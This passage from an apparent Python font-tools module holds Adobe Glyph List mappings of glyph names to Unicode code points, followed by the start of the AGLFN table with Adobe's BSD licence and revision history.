shinsindot;FB2B
shinsindothebrew;FB2B
shook;0282
sigma;03C3
sigma1;03C2
sigmafinal;03C2
sigmalunatesymbolgreek;03F2
sihiragana;3057
sikatakana;30B7
sikatakanahalfwidth;FF7C
siluqhebrew;05BD
siluqlefthebrew;05BD
similar;223C
sindothebrew;05C2
siosacirclekorean;3274
siosaparenkorean;3214
sioscieuckorean;317E
sioscirclekorean;3266
sioskiyeokkorean;317A
sioskorean;3145
siosnieunkorean;317B
siosparenkorean;3206
siospieupkorean;317D
siostikeutkorean;317C
six;0036
sixarabic;0666
sixbengali;09EC
sixcircle;2465
sixcircleinversesansserif;278F
sixdeva;096C
sixgujarati;0AEC
sixgurmukhi;0A6C
sixhackarabic;0666
sixhangzhou;3026
sixideographicparen;3225
sixinferior;2086
sixmonospace;FF16
sixoldstyle;F736
sixparen;2479
sixperiod;248D
sixpersian;06F6
sixroman;2175
sixsuperior;2076
sixteencircle;246F
sixteencurrencydenominatorbengali;09F9
sixteenparen;2483
sixteenperiod;2497
sixthai;0E56
slash;002F
slashmonospace;FF0F
slong;017F
slongdotaccent;1E9B
smileface;263A
smonospace;FF53
sofpasuqhebrew;05C3
softhyphen;00AD
softsigncyrillic;044C
sohiragana;305D
sokatakana;30BD
sokatakanahalfwidth;FF7F
soliduslongoverlaycmb;0338
solidusshortoverlaycmb;0337
sorusithai;0E29
sosalathai;0E28
sosothai;0E0B
sosuathai;0E2A
space;0020
spacehackarabic;0020
spade;2660
spadesuitblack;2660
spadesuitwhite;2664
sparen;24AE
squarebelowcmb;033B
squarecc;33C4
squarecm;339D
squarediagonalcrosshatchfill;25A9
squarehorizontalfill;25A4
squarekg;338F
squarekm;339E
squarekmcapital;33CE
squareln;33D1
squarelog;33D2
squaremg;338E
squaremil;33D5
squaremm;339C
squaremsquared;33A1
squareorthogonalcrosshatchfill;25A6
squareupperlefttolowerrightfill;25A7
squareupperrighttolowerleftfill;25A8
squareverticalfill;25A5
squarewhitewithsmallblack;25A3
srsquare;33DB
ssabengali;09B7
ssadeva;0937
ssagujarati;0AB7
ssangcieuckorean;3149
ssanghieuhkorean;3185
ssangieungkorean;3180
ssangkiyeokkorean;3132
ssangnieunkorean;3165
ssangpieupkorean;3143
ssangsioskorean;3146
ssangtikeutkorean;3138
ssuperior;F6F2
sterling;00A3
sterlingmonospace;FFE1
strokelongoverlaycmb;0336
strokeshortoverlaycmb;0335
subset;2282
subsetnotequal;228A
subsetorequal;2286
succeeds;227B
suchthat;220B
suhiragana;3059
sukatakana;30B9
sukatakanahalfwidth;FF7D
sukunarabic;0652
summation;2211
sun;263C
superset;2283
supersetnotequal;228B
supersetorequal;2287
svsquare;33DC
syouwaerasquare;337C
t;0074
tabengali;09A4
tackdown;22A4
tackleft;22A3
tadeva;0924
tagujarati;0AA4
tagurmukhi;0A24
taharabic;0637
tahfinalarabic;FEC2
tahinitialarabic;FEC3
tahiragana;305F
tahmedialarabic;FEC4
taisyouerasquare;337D
takatakana;30BF
takatakanahalfwidth;FF80
tatweelarabic;0640
tau;03C4
tav;05EA
tavdages;FB4A
tavdagesh;FB4A
tavdageshhebrew;FB4A
tavhebrew;05EA
tbar;0167
tbopomofo;310A
tcaron;0165
tccurl;02A8
tcedilla;0163
tcheharabic;0686
tchehfinalarabic;FB7B
tchehinitialarabic;FB7C
tchehmedialarabic;FB7D
tchehmeeminitialarabic;FB7C FEE4
tcircle;24E3
tcircumflexbelow;1E71
tcommaaccent;0163
tdieresis;1E97
tdotaccent;1E6B
tdotbelow;1E6D
tecyrillic;0442
tedescendercyrillic;04AD
teharabic;062A
tehfinalarabic;FE96
tehhahinitialarabic;FCA2
tehhahisolatedarabic;FC0C
tehinitialarabic;FE97
tehiragana;3066
tehjeeminitialarabic;FCA1
tehjeemisolatedarabic;FC0B
tehmarbutaarabic;0629
tehmarbutafinalarabic;FE94
tehmedialarabic;FE98
tehmeeminitialarabic;FCA4
tehmeemisolatedarabic;FC0E
tehnoonfinalarabic;FC73
tekatakana;30C6
tekatakanahalfwidth;FF83
telephone;2121
telephoneblack;260E
telishagedolahebrew;05A0
telishaqetanahebrew;05A9
tencircle;2469
tenideographicparen;3229
tenparen;247D
tenperiod;2491
tenroman;2179
tesh;02A7
tet;05D8
tetdagesh;FB38
tetdageshhebrew;FB38
tethebrew;05D8
tetsecyrillic;04B5
tevirhebrew;059B
tevirlefthebrew;059B
thabengali;09A5
thadeva;0925
thagujarati;0AA5
thagurmukhi;0A25
thalarabic;0630
thalfinalarabic;FEAC
thanthakhatlowleftthai;F898
thanthakhatlowrightthai;F897
thanthakhatthai;0E4C
thanthakhatupperleftthai;F896
theharabic;062B
thehfinalarabic;FE9A
thehinitialarabic;FE9B
thehmedialarabic;FE9C
thereexists;2203
therefore;2234
theta;03B8
theta1;03D1
thetasymbolgreek;03D1
thieuthacirclekorean;3279
thieuthaparenkorean;3219
thieuthcirclekorean;326B
thieuthkorean;314C
thieuthparenkorean;320B
thirteencircle;246C
thirteenparen;2480
thirteenperiod;2494
thonangmonthothai;0E11
thook;01AD
thophuthaothai;0E12
thorn;00FE
thothahanthai;0E17
thothanthai;0E10
thothongthai;0E18
thothungthai;0E16
thousandcyrillic;0482
thousandsseparatorarabic;066C
thousandsseparatorpersian;066C
three;0033
threearabic;0663
threebengali;09E9
threecircle;2462
threecircleinversesansserif;278C
threedeva;0969
threeeighths;215C
threegujarati;0AE9
threegurmukhi;0A69
threehackarabic;0663
threehangzhou;3023
threeideographicparen;3222
threeinferior;2083
threemonospace;FF13
threenumeratorbengali;09F6
threeoldstyle;F733
threeparen;2476
threeperiod;248A
threepersian;06F3
threequarters;00BE
threequartersemdash;F6DE
threeroman;2172
threesuperior;00B3
threethai;0E53
thzsquare;3394
tihiragana;3061
tikatakana;30C1
tikatakanahalfwidth;FF81
tikeutacirclekorean;3270
tikeutaparenkorean;3210
tikeutcirclekorean;3262
tikeutkorean;3137
tikeutparenkorean;3202
tilde;02DC
tildebelowcmb;0330
tildecmb;0303
tildecomb;0303
tildedoublecmb;0360
tildeoperator;223C
tildeoverlaycmb;0334
tildeverticalcmb;033E
timescircle;2297
tipehahebrew;0596
tipehalefthebrew;0596
tippigurmukhi;0A70
titlocyrilliccmb;0483
tiwnarmenian;057F
tlinebelow;1E6F
tmonospace;FF54
toarmenian;0569
tohiragana;3068
tokatakana;30C8
tokatakanahalfwidth;FF84
tonebarextrahighmod;02E5
tonebarextralowmod;02E9
tonebarhighmod;02E6
tonebarlowmod;02E8
tonebarmidmod;02E7
tonefive;01BD
tonesix;0185
tonetwo;01A8
tonos;0384
tonsquare;3327
topatakthai;0E0F
tortoiseshellbracketleft;3014
tortoiseshellbracketleftsmall;FE5D
tortoiseshellbracketleftvertical;FE39
tortoiseshellbracketright;3015
tortoiseshellbracketrightsmall;FE5E
tortoiseshellbracketrightvertical;FE3A
totaothai;0E15
tpalatalhook;01AB
tparen;24AF
trademark;2122
trademarksans;F8EA
trademarkserif;F6DB
tretroflexhook;0288
triagdn;25BC
triaglf;25C4
triagrt;25BA
triagup;25B2
ts;02A6
tsadi;05E6
tsadidagesh;FB46
tsadidageshhebrew;FB46
tsadihebrew;05E6
tsecyrillic;0446
tsere;05B5
tsere12;05B5
tsere1e;05B5
tsere2b;05B5
tserehebrew;05B5
tserenarrowhebrew;05B5
tserequarterhebrew;05B5
tserewidehebrew;05B5
tshecyrillic;045B
tsuperior;F6F3
ttabengali;099F
ttadeva;091F
ttagujarati;0A9F
ttagurmukhi;0A1F
tteharabic;0679
ttehfinalarabic;FB67
ttehinitialarabic;FB68
ttehmedialarabic;FB69
tthabengali;09A0
tthadeva;0920
tthagujarati;0AA0
tthagurmukhi;0A20
tturned;0287
tuhiragana;3064
tukatakana;30C4
tukatakanahalfwidth;FF82
tusmallhiragana;3063
tusmallkatakana;30C3
tusmallkatakanahalfwidth;FF6F
twelvecircle;246B
twelveparen;247F
twelveperiod;2493
twelveroman;217B
twentycircle;2473
twentyhangzhou;5344
twentyparen;2487
twentyperiod;249B
two;0032
twoarabic;0662
twobengali;09E8
twocircle;2461
twocircleinversesansserif;278B
twodeva;0968
twodotenleader;2025
twodotleader;2025
twodotleadervertical;FE30
twogujarati;0AE8
twogurmukhi;0A68
twohackarabic;0662
twohangzhou;3022
twoideographicparen;3221
twoinferior;2082
twomonospace;FF12
twonumeratorbengali;09F5
twooldstyle;F732
twoparen;2475
twoperiod;2489
twopersian;06F2
tworoman;2171
twostroke;01BB
twosuperior;00B2
twothai;0E52
twothirds;2154
u;0075
uacute;00FA
ubar;0289
ubengali;0989
ubopomofo;3128
ubreve;016D
ucaron;01D4
ucircle;24E4
ucircumflex;00FB
ucircumflexbelow;1E77
ucyrillic;0443
udattadeva;0951
udblacute;0171
udblgrave;0215
udeva;0909
udieresis;00FC
udieresisacute;01D8
udieresisbelow;1E73
udieresiscaron;01DA
udieresiscyrillic;04F1
udieresisgrave;01DC
udieresismacron;01D6
udotbelow;1EE5
ugrave;00F9
ugujarati;0A89
ugurmukhi;0A09
uhiragana;3046
uhookabove;1EE7
uhorn;01B0
uhornacute;1EE9
uhorndotbelow;1EF1
uhorngrave;1EEB
uhornhookabove;1EED
uhorntilde;1EEF
uhungarumlaut;0171
uhungarumlautcyrillic;04F3
uinvertedbreve;0217
ukatakana;30A6
ukatakanahalfwidth;FF73
ukcyrillic;0479
ukorean;315C
umacron;016B
umacroncyrillic;04EF
umacrondieresis;1E7B
umatragurmukhi;0A41
umonospace;FF55
underscore;005F
underscoredbl;2017
underscoremonospace;FF3F
underscorevertical;FE33
underscorewavy;FE4F
union;222A
universal;2200
uogonek;0173
uparen;24B0
upblock;2580
upperdothebrew;05C4
upsilon;03C5
upsilondieresis;03CB
upsilondieresistonos;03B0
upsilonlatin;028A
upsilontonos;03CD
uptackbelowcmb;031D
uptackmod;02D4
uragurmukhi;0A73
uring;016F
ushortcyrillic;045E
usmallhiragana;3045
usmallkatakana;30A5
usmallkatakanahalfwidth;FF69
ustraightcyrillic;04AF
ustraightstrokecyrillic;04B1
utilde;0169
utildeacute;1E79
utildebelow;1E75
uubengali;098A
uudeva;090A
uugujarati;0A8A
uugurmukhi;0A0A
uumatragurmukhi;0A42
uuvowelsignbengali;09C2
uuvowelsigndeva;0942
uuvowelsigngujarati;0AC2
uvowelsignbengali;09C1
uvowelsigndeva;0941
uvowelsigngujarati;0AC1
v;0076
vadeva;0935
vagujarati;0AB5
vagurmukhi;0A35
vakatakana;30F7
vav;05D5
vavdagesh;FB35
vavdagesh65;FB35
vavdageshhebrew;FB35
vavhebrew;05D5
vavholam;FB4B
vavholamhebrew;FB4B
vavvavhebrew;05F0
vavyodhebrew;05F1
vcircle;24E5
vdotbelow;1E7F
vecyrillic;0432
veharabic;06A4
vehfinalarabic;FB6B
vehinitialarabic;FB6C
vehmedialarabic;FB6D
vekatakana;30F9
venus;2640
verticalbar;007C
verticallineabovecmb;030D
verticallinebelowcmb;0329
verticallinelowmod;02CC
verticallinemod;02C8
vewarmenian;057E
vhook;028B
vikatakana;30F8
viramabengali;09CD
viramadeva;094D
viramagujarati;0ACD
visargabengali;0983
visargadeva;0903
visargagujarati;0A83
vmonospace;FF56
voarmenian;0578
voicediterationhiragana;309E
voicediterationkatakana;30FE
voicedmarkkana;309B
voicedmarkkanahalfwidth;FF9E
vokatakana;30FA
vparen;24B1
vtilde;1E7D
vturned;028C
vuhiragana;3094
vukatakana;30F4
w;0077
wacute;1E83
waekorean;3159
wahiragana;308F
wakatakana;30EF
wakatakanahalfwidth;FF9C
wakorean;3158
wasmallhiragana;308E
wasmallkatakana;30EE
wattosquare;3357
wavedash;301C
wavyunderscorevertical;FE34
wawarabic;0648
wawfinalarabic;FEEE
wawhamzaabovearabic;0624
wawhamzaabovefinalarabic;FE86
wbsquare;33DD
wcircle;24E6
wcircumflex;0175
wdieresis;1E85
wdotaccent;1E87
wdotbelow;1E89
wehiragana;3091
weierstrass;2118
wekatakana;30F1
wekorean;315E
weokorean;315D
wgrave;1E81
whitebullet;25E6
whitecircle;25CB
whitecircleinverse;25D9
whitecornerbracketleft;300E
whitecornerbracketleftvertical;FE43
whitecornerbracketright;300F
whitecornerbracketrightvertical;FE44
whitediamond;25C7
whitediamondcontainingblacksmalldiamond;25C8
whitedownpointingsmalltriangle;25BF
whitedownpointingtriangle;25BD
whiteleftpointingsmalltriangle;25C3
whiteleftpointingtriangle;25C1
whitelenticularbracketleft;3016
whitelenticularbracketright;3017
whiterightpointingsmalltriangle;25B9
whiterightpointingtriangle;25B7
whitesmallsquare;25AB
whitesmilingface;263A
whitesquare;25A1
whitestar;2606
whitetelephone;260F
whitetortoiseshellbracketleft;3018
whitetortoiseshellbracketright;3019
whiteuppointingsmalltriangle;25B5
whiteuppointingtriangle;25B3
wihiragana;3090
wikatakana;30F0
wikorean;315F
wmonospace;FF57
wohiragana;3092
wokatakana;30F2
wokatakanahalfwidth;FF66
won;20A9
wonmonospace;FFE6
wowaenthai;0E27
wparen;24B2
wring;1E98
wsuperior;02B7
wturned;028D
wynn;01BF
x;0078
xabovecmb;033D
xbopomofo;3112
xcircle;24E7
xdieresis;1E8D
xdotaccent;1E8B
xeharmenian;056D
xi;03BE
xmonospace;FF58
xparen;24B3
xsuperior;02E3
y;0079
yaadosquare;334E
yabengali;09AF
yacute;00FD
yadeva;092F
yaekorean;3152
yagujarati;0AAF
yagurmukhi;0A2F
yahiragana;3084
yakatakana;30E4
yakatakanahalfwidth;FF94
yakorean;3151
yamakkanthai;0E4E
yasmallhiragana;3083
yasmallkatakana;30E3
yasmallkatakanahalfwidth;FF6C
yatcyrillic;0463
ycircle;24E8
ycircumflex;0177
ydieresis;00FF
ydotaccent;1E8F
ydotbelow;1EF5
yeharabic;064A
yehbarreearabic;06D2
yehbarreefinalarabic;FBAF
yehfinalarabic;FEF2
yehhamzaabovearabic;0626
yehhamzaabovefinalarabic;FE8A
yehhamzaaboveinitialarabic;FE8B
yehhamzaabovemedialarabic;FE8C
yehinitialarabic;FEF3
yehmedialarabic;FEF4
yehmeeminitialarabic;FCDD
yehmeemisolatedarabic;FC58
yehnoonfinalarabic;FC94
yehthreedotsbelowarabic;06D1
yekorean;3156
yen;00A5
yenmonospace;FFE5
yeokorean;3155
yeorinhieuhkorean;3186
yerahbenyomohebrew;05AA
yerahbenyomolefthebrew;05AA
yericyrillic;044B
yerudieresiscyrillic;04F9
yesieungkorean;3181
yesieungpansioskorean;3183
yesieungsioskorean;3182
yetivhebrew;059A
ygrave;1EF3
yhook;01B4
yhookabove;1EF7
yiarmenian;0575
yicyrillic;0457
yikorean;3162
yinyang;262F
yiwnarmenian;0582
ymonospace;FF59
yod;05D9
yoddagesh;FB39
yoddageshhebrew;FB39
yodhebrew;05D9
yodyodhebrew;05F2
yodyodpatahhebrew;FB1F
yohiragana;3088
yoikorean;3189
yokatakana;30E8
yokatakanahalfwidth;FF96
yokorean;315B
yosmallhiragana;3087
yosmallkatakana;30E7
yosmallkatakanahalfwidth;FF6E
yotgreek;03F3
yoyaekorean;3188
yoyakorean;3187
yoyakthai;0E22
yoyingthai;0E0D
yparen;24B4
ypogegrammeni;037A
ypogegrammenigreekcmb;0345
yr;01A6
yring;1E99
ysuperior;02B8
ytilde;1EF9
yturned;028E
yuhiragana;3086
yuikorean;318C
yukatakana;30E6
yukatakanahalfwidth;FF95
yukorean;3160
yusbigcyrillic;046B
yusbigiotifiedcyrillic;046D
yuslittlecyrillic;0467
yuslittleiotifiedcyrillic;0469
yusmallhiragana;3085
yusmallkatakana;30E5
yusmallkatakanahalfwidth;FF6D
yuyekorean;318B
yuyeokorean;318A
yyabengali;09DF
yyadeva;095F
z;007A
zaarmenian;0566
zacute;017A
zadeva;095B
zagurmukhi;0A5B
zaharabic;0638
zahfinalarabic;FEC6
zahinitialarabic;FEC7
zahiragana;3056
zahmedialarabic;FEC8
zainarabic;0632
zainfinalarabic;FEB0
zakatakana;30B6
zaqefgadolhebrew;0595
zaqefqatanhebrew;0594
zarqahebrew;0598
zayin;05D6
zayindagesh;FB36
zayindageshhebrew;FB36
zayinhebrew;05D6
zbopomofo;3117
zcaron;017E
zcircle;24E9
zcircumflex;1E91
zcurl;0291
zdot;017C
zdotaccent;017C
zdotbelow;1E93
zecyrillic;0437
zedescendercyrillic;0499
zedieresiscyrillic;04DF
zehiragana;305C
zekatakana;30BC
zero;0030
zeroarabic;0660
zerobengali;09E6
zerodeva;0966
zerogujarati;0AE6
zerogurmukhi;0A66
zerohackarabic;0660
zeroinferior;2080
zeromonospace;FF10
zerooldstyle;F730
zeropersian;06F0
zerosuperior;2070
zerothai;0E50
zerowidthjoiner;FEFF
zerowidthnonjoiner;200C
zerowidthspace;200B
zeta;03B6
zhbopomofo;3113
zhearmenian;056A
zhebrevecyrillic;04C2
zhecyrillic;0436
zhedescendercyrillic;0497
zhedieresiscyrillic;04DD
zihiragana;3058
zikatakana;30B8
zinorhebrew;05AE
zlinebelow;1E95
zmonospace;FF5A
zohiragana;305E
zokatakana;30BE
zparen;24B5
zretroflexhook;0290
zstroke;01B6
zuhiragana;305A
zukatakana;30BA
# END
"""
_aglfnText = """\
# -----------------------------------------------------------
# Copyright 2002-2019 Adobe (http://www.adobe.com/).
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the
# following conditions are met:
#
# Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# Neither the name of Adobe nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------
# Name: Adobe Glyph List For New Fonts
# Table version: 1.7
# Date: November 6, 2008
# URL: https://github.com/adobe-type-tools/agl-aglfn
#
# Description:
#
# AGLFN (Adobe Glyph List For New Fonts) provides a list of base glyph
# names that are recommended for new fonts, which are compatible with
# the AGL (Adobe Glyph List) Specification, and which should be used
# as described in Section 6 of that document. AGLFN comprises the set
# of glyph names from AGL that map via the AGL Specification rules to
# the semantically correct UV (Unicode Value). For example, "Asmall"
# is omitted because AGL maps this glyph name to the PUA (Private Use
# Area) value U+F761, rather than to the UV that maps from the glyph
# name "A." Also omitted is "ffi," because AGL maps this to the
# Alphabetic Presentation Forms value U+FB03, rather than decomposing
# it into the following sequence of three UVs: U+0066, U+0066, and
# U+0069. The name "arrowvertex" has been omitted because this glyph
# now has a real UV, and AGL is now incorrect in mapping it to the PUA
# value U+F8E6. If you do not find an appropriate name for your glyph
# in this list, then please refer to Section 6 of the AGL
# Specification.
#
# Format: three semicolon-delimited fields:
# (1) Standard UV or CUS UV--four uppercase hexadecimal digits
# (2) Glyph name--upper/lowercase letters and digits
# (3) Character names: Unicode character names for standard UVs, and
# descriptive names for CUS UVs--uppercase letters, hyphen, and
# space
#
# The records are sorted by glyph name in increasing ASCII order,
# entries with the same glyph name are sorted in decreasing priority
# order, the UVs and Unicode character names are provided for
# convenience, lines starting with "#" are comments, and blank lines
# should be ignored.
#
# Revision History:
#
# 1.7 [6 November 2008]
# - Reverted to the original 1.4 and earlier mappings for Delta,
# Omega, and mu.
# - Removed mappings for "afii" names. These should now be assigned
# "uni" names.
# - Removed mappings for "commaaccent" names. These should now be
# assigned "uni" names.
#
# 1.6 [30 January 2006]
# - Completed work intended in 1.5.
#
# 1.5 [23 November 2005]
# - Removed duplicated block at end of file.
# - Changed mappings:
# 2206;Delta;INCREMENT changed to 0394;Delta;GREEK CAPITAL LETTER DELTA
# 2126;Omega;OHM SIGN changed to 03A9;Omega;GREEK CAPITAL LETTER OMEGA
# 03BC;mu;MICRO SIGN changed to 03BC;mu;GREEK SMALL LETTER MU
# - Corrected statement above about why "ffi" is omitted.
#
# 1.4 [24 September 2003]
# - Changed version to 1.4, to avoid confusion with the AGL 1.3.
# - Fixed spelling errors in the header.
# - Fully removed "arrowvertex," as it is mapped only to a PUA Unicode
# value in some fonts.
#
# 1.1 [17 April 2003]
# - Renamed [Tt]cedilla back to [Tt]commaaccent.
#
# 1.0 [31 January 2003]
# - Original version.
# - Derived from the AGLv1.2 by:
# removing the PUA area codes;
# removing duplicate Unicode mappings; and
# renaming "tcommaaccent" to "tcedilla" and "Tcommaaccent" to "Tcedilla"
#
0041;A;LATIN CAPITAL LETTER A
00C6;AE;LATIN CAPITAL LETTER AE
01FC;AEacute;LATIN CAPITAL LETTER AE WITH ACUTE
00C1;Aacute;LATIN CAPITAL LETTER A WITH ACUTE
0102;Abreve;LATIN CAPITAL LETTER A WITH BREVE
00C2;Acircumflex;LATIN CAPITAL LETTER A WITH CIRCUMFLEX
00C4;Adieresis;LATIN CAPITAL LETTER A WITH DIAERESIS
00C0;Agrave;LATIN CAPITAL LETTER A WITH GRAVE
0391;Alpha;GREEK CAPITAL LETTER ALPHA
0386;Alphatonos;GREEK CAPITAL LETTER ALPHA WITH TONOS
0100;Amacron;LATIN CAPITAL LETTER A WITH MACRON
0104;Aogonek;LATIN CAPITAL LETTER A WITH OGONEK
00C5;Aring;LATIN CAPITAL LETTER A WITH RING ABOVE
01FA;Aringacute;LATIN CAPITAL LETTER A WITH RING ABOVE AND ACUTE
00C3;Atilde;LATIN CAPITAL LETTER A WITH TILDE
0042;B;LATIN CAPITAL LETTER B
0392;Beta;GREEK CAPITAL LETTER BETA
0043;C;LATIN CAPITAL LETTER C
0106;Cacute;LATIN CAPITAL LETTER C WITH ACUTE
010C;Ccaron;LATIN CAPITAL LETTER C WITH CARON
00C7;Ccedilla;LATIN CAPITAL LETTER C WITH CEDILLA
0108;Ccircumflex;LATIN CAPITAL LETTER C WITH CIRCUMFLEX
010A;Cdotaccent;LATIN CAPITAL LETTER C WITH DOT ABOVE
03A7;Chi;GREEK CAPITAL LETTER CHI
0044;D;LATIN CAPITAL LETTER D
010E;Dcaron;LATIN CAPITAL LETTER D WITH CARON
0110;Dcroat;LATIN CAPITAL LETTER D WITH STROKE
2206;Delta;INCREMENT
0045;E;LATIN CAPITAL LETTER E
00C9;Eacute;LATIN CAPITAL LETTER E WITH ACUTE
0114;Ebreve;LATIN CAPITAL LETTER E WITH BREVE
011A;Ecaron;LATIN CAPITAL LETTER E WITH CARON
00CA;Ecircumflex;LATIN CAPITAL LETTER E WITH CIRCUMFLEX
00CB;Edieresis;LATIN CAPITAL LETTER E WITH DIAERESIS
0116;Edotaccent;LATIN CAPITAL LETTER E WITH DOT ABOVE
00C8;Egrave;LATIN CAPITAL LETTER E WITH GRAVE
0112;Emacron;LATIN CAPITAL LETTER E WITH MACRON
014A;Eng;LATIN CAPITAL LETTER ENG
0118;Eogonek;LATIN CAPITAL LETTER E WITH OGONEK
0395;Epsilon;GREEK CAPITAL LETTER EPSILON
0388;Epsilontonos;GREEK CAPITAL LETTER EPSILON WITH TONOS
0397;Eta;GREEK CAPITAL LETTER ETA
0389;Etatonos;GREEK CAPITAL LETTER ETA WITH TONOS
00D0;Eth;LATIN CAPITAL LETTER ETH
20AC;Euro;EURO SIGN
0046;F;LATIN CAPITAL LETTER F
0047;G;LATIN CAPITAL LETTER G
0393;Gamma;GREEK CAPITAL LETTER GAMMA
011E;Gbreve;LATIN CAPITAL LETTER G WITH BREVE
01E6;Gcaron;LATIN CAPITAL LETTER G WITH CARON
011C;Gcircumflex;LATIN CAPITAL LETTER G WITH CIRCUMFLEX
0120;Gdotaccent;LATIN CAPITAL LETTER G WITH DOT ABOVE
0048;H;LATIN CAPITAL LETTER H
25CF;H18533;BLACK CIRCLE
25AA;H18543;BLACK SMALL SQUARE
25AB;H18551;WHITE SMALL SQUARE
25A1;H22073;WHITE SQUARE
0126;Hbar;LATIN CAPITAL LETTER H WITH STROKE
0124;Hcircumflex;LATIN CAPITAL LETTER H WITH CIRCUMFLEX
0049;I;LATIN CAPITAL LETTER I
0132;IJ;LATIN CAPITAL LIGATURE IJ
00CD;Iacute;LATIN CAPITAL LETTER I WITH ACUTE
012C;Ibreve;LATIN CAPITAL LETTER I WITH BREVE
00CE;Icircumflex;LATIN CAPITAL LETTER I WITH CIRCUMFLEX
00CF;Idieresis;LATIN CAPITAL LETTER I WITH DIAERESIS
0130;Idotaccent;LATIN CAPITAL LETTER I WITH DOT ABOVE
2111;Ifraktur;BLACK-LETTER CAPITAL I
00CC;Igrave;LATIN CAPITAL LETTER I WITH GRAVE
012A;Imacron;LATIN CAPITAL LETTER I WITH MACRON
012E;Iogonek;LATIN CAPITAL LETTER I WITH OGONEK
0399;Iota;GREEK CAPITAL LETTER IOTA
03AA;Iotadieresis;GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
038A;Iotatonos;GREEK CAPITAL LETTER IOTA WITH TONOS
0128;Itilde;LATIN CAPITAL LETTER I WITH TILDE
004A;J;LATIN CAPITAL LETTER J
0134;Jcircumflex;LATIN CAPITAL LETTER J WITH CIRCUMFLEX
004B;K;LATIN CAPITAL LETTER K
039A;Kappa;GREEK CAPITAL LETTER KAPPA
004C;L;LATIN CAPITAL LETTER L
0139;Lacute;LATIN CAPITAL LETTER L WITH ACUTE
039B;Lambda;GREEK CAPITAL LETTER LAMDA
013D;Lcaron;LATIN CAPITAL LETTER L WITH CARON
013F;Ldot;LATIN CAPITAL LETTER L WITH MIDDLE DOT
0141;Lslash;LATIN CAPITAL LETTER L WITH STROKE
004D;M;LATIN CAPITAL LETTER M
039C;Mu;GREEK CAPITAL LETTER MU
004E;N;LATIN CAPITAL LETTER N
0143;Nacute;LATIN CAPITAL LETTER N WITH ACUTE
0147;Ncaron;LATIN CAPITAL LETTER N WITH CARON
00D1;Ntilde;LATIN CAPITAL LETTER N WITH TILDE
039D;Nu;GREEK CAPITAL LETTER NU
004F;O;LATIN CAPITAL LETTER O
0152;OE;LATIN CAPITAL LIGATURE OE
00D3;Oacute;LATIN CAPITAL LETTER O WITH ACUTE
014E;Obreve;LATIN CAPITAL LETTER O WITH BREVE
00D4;Ocircumflex;LATIN CAPITAL LETTER O WITH CIRCUMFLEX
00D6;Odieresis;LATIN CAPITAL LETTER O WITH DIAERESIS
00D2;Ograve;LATIN CAPITAL LETTER O WITH GRAVE
01A0;Ohorn;LATIN CAPITAL LETTER O WITH HORN
0150;Ohungarumlaut;LATIN CAPITAL LETTER O WITH DOUBLE ACUTE
014C;Omacron;LATIN CAPITAL LETTER O WITH MACRON
2126;Omega;OHM SIGN
038F;Omegatonos;GREEK CAPITAL LETTER OMEGA WITH TONOS
039F;Omicron;GREEK CAPITAL LETTER OMICRON
038C;Omicrontonos;GREEK CAPITAL LETTER OMICRON WITH TONOS
00D8;Oslash;LATIN CAPITAL LETTER O WITH STROKE
01FE;Oslashacute;LATIN CAPITAL LETTER O WITH STROKE AND ACUTE
00D5;Otilde;LATIN CAPITAL LETTER O WITH TILDE
0050;P;LATIN CAPITAL LETTER P
03A6;Phi;GREEK CAPITAL LETTER PHI
03A0;Pi;GREEK CAPITAL LETTER PI
03A8;Psi;GREEK CAPITAL LETTER PSI
0051;Q;LATIN CAPITAL LETTER Q
0052;R;LATIN CAPITAL LETTER R
0154;Racute;LATIN CAPITAL LETTER R WITH ACUTE
0158;Rcaron;LATIN CAPITAL LETTER R WITH CARON
211C;Rfraktur;BLACK-LETTER CAPITAL R
03A1;Rho;GREEK CAPITAL LETTER RHO
0053;S;LATIN CAPITAL LETTER S
250C;SF010000;BOX DRAWINGS LIGHT DOWN AND RIGHT
2514;SF020000;BOX DRAWINGS LIGHT UP AND RIGHT
2510;SF030000;BOX DRAWINGS LIGHT DOWN AND LEFT
2518;SF040000;BOX DRAWINGS LIGHT UP AND LEFT
253C;SF050000;BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
252C;SF060000;BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
2534;SF070000;BOX DRAWINGS LIGHT UP AND HORIZONTAL
251C;SF080000;BOX DRAWINGS LIGHT VERTICAL AND RIGHT
2524;SF090000;BOX DRAWINGS LIGHT VERTICAL AND LEFT
2500;SF100000;BOX DRAWINGS LIGHT HORIZONTAL
2502;SF110000;BOX DRAWINGS LIGHT VERTICAL
2561;SF190000;BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
2562;SF200000;BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
2556;SF210000;BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
2555;SF220000;BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
2563;SF230000;BOX DRAWINGS DOUBLE VERTICAL AND LEFT
2551;SF240000;BOX DRAWINGS DOUBLE VERTICAL
2557;SF250000;BOX DRAWINGS DOUBLE DOWN AND LEFT
